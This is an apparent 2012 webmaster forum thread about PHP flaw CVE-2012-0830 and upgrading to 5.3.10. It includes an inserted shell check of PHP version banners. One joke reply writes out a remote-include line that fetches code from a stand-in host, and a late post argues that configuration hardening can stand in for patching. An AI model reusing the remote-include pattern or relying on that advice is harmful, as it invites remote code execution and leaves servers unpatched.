GoFuckYourself.com - Adult Webmaster Forum


MrGusMuller 02-04-2012 03:31 AM

Critical vulnerability identified in PHP
 
Quote:

A critical vulnerability in the most recent release of PHP has just been found (CVE-2012-0830). This exploit could allow arbitrary code to be remotely executed on a PHP system. This vulnerability is present both on PHP 5.3.9, and on PHP 5.2.17 that contains a backported fix for CVE-2011-4885.
in Zend Server Update Email

https://bugzilla.redhat.com/show_bug.cgi?id=786686
http://thexploit.com/sec/critical-ph...collision-dos/

You all should update to PHP 5.3.10.

raymor 02-04-2012 03:52 AM

Thanks. Of course PHP itself is an arbitrary code execution vulnerability. include(http://hack.com/?yourlib.php) anyone?

Klen 02-04-2012 06:44 AM

I can't update to 5.3, it's too different to ver 5.2. Any fix for version 5.2?

fris 02-04-2012 06:46 AM

Quote:

Originally Posted by KlenTelaris (Post 18734687)
I can't update to 5.3, it's too different to ver 5.2. Any fix for version 5.2?

I'm pretty sure it only affects 5.3.x

Fletch XXX 02-04-2012 06:46 AM

thanks for posting.

DamageX 02-04-2012 06:58 AM

Quote:

Originally Posted by fris (Post 18734690)
I'm pretty sure it only affects 5.3.x

Quote:

This vulnerability is present both on PHP 5.3.9, and on PHP 5.2.17 that contains a backported fix for CVE-2011-4885.

Looks like it does affect at least one version of 5.2.x

fris 02-04-2012 07:33 AM

oh snap time to upgrade then

fris 02-04-2012 12:43 PM

just finished my upgrade

Quote:

PHP 5.3.10 with Suhosin-Patch (cli) (built: Feb 4 2012 06:50:45)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies
with the ionCube PHP Loader v4.0.12, Copyright (c) 2002-2011, by ionCube Ltd
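
Added example, not part of any post in this thread: a shell check that classifies a `php -v` banner like the one above against the versions named in the quoted advisory (5.3.9, 5.2.17 with the CVE-2011-4885 backport, fix in 5.3.10). The function name `classify_php_banner` and its status words are assumptions made for this example.

```shell
#!/bin/sh
# Added example. classify_php_banner is a hypothetical helper, not part of PHP.
# Version facts come from the advisory quoted in this thread (CVE-2012-0830).

classify_php_banner() {
    # `php -v` starts with e.g. "PHP 5.3.10 with Suhosin-Patch (cli) (built: ...)"
    ver=$(printf '%s\n' "$1" |
        sed -n '1s/^PHP \([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\).*/\1/p')
    if [ -z "$ver" ]; then
        echo "unknown no 'PHP x.y.z' on the first banner line"
        return 2
    fi
    # Compare numerically so that 5.3.10 sorts after 5.3.9.
    old_ifs=$IFS; IFS=.
    set -- $ver
    IFS=$old_ifs
    n=$(( $1 * 10000 + $2 * 100 + $3 ))
    if [ "$n" -eq 50309 ]; then
        echo "affected $ver is named in the advisory; update to 5.3.10"
    elif [ "$n" -eq 50217 ]; then
        echo "check-backport $ver is affected if the build carries the CVE-2011-4885 backport"
    elif [ "$n" -ge 50310 ]; then
        echo "fixed $ver is at or above 5.3.10"
    else
        echo "not-listed $ver is not named in the thread; check the vendor advisory"
    fi
}

# Constructed sample: first line of the banner posted above.
SAMPLE_BANNER='PHP 5.3.10 with Suhosin-Patch (cli) (built: Feb 4 2012 06:50:45)'

# On a live host: classify_php_banner "$(php -v)"
```

Distribution packages can carry backported fixes under an unchanged version number, so treat the result as a starting point and confirm against the vendor's changelog.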

LiveDose 02-04-2012 03:53 PM

Bump. Thanks.

MrGusMuller 02-07-2012 05:05 AM

For those with cPanel...
EasyApache 3.8.6 is now available; in this build PHP 5.3.10 replaces 5.3.9.
The change log is available here: http://docs.cpanel.net/twiki/bin/vie...syApache#3.8.6

seeandsee 02-07-2012 05:34 AM

Fucking vulnerability holes, is there some super protected coding to work with...

Klen 02-07-2012 06:36 AM

But still, the question is will it fuck up some scripts if I do update....

Operator 02-07-2012 06:40 AM

PHP 5.1.6 :)

6South 02-07-2012 06:41 AM

PHP is a risk no matter what version you upgrade to and installing the latest, greatest build of PHP is almost guaranteed to break at least one of your apps.

As usual, this type of vulnerability can be protected against without constant upgrading by simply managing your PHP configuration and responsible administration / monitoring of your servers.

Suhosin, responsible PHP settings, active protection (mod_security) and a decent malware / exploit scanner will serve you much better than trying to keep up with the patches. For every published exploit there's at least a dozen others out there at any given time.


All times are GMT -7.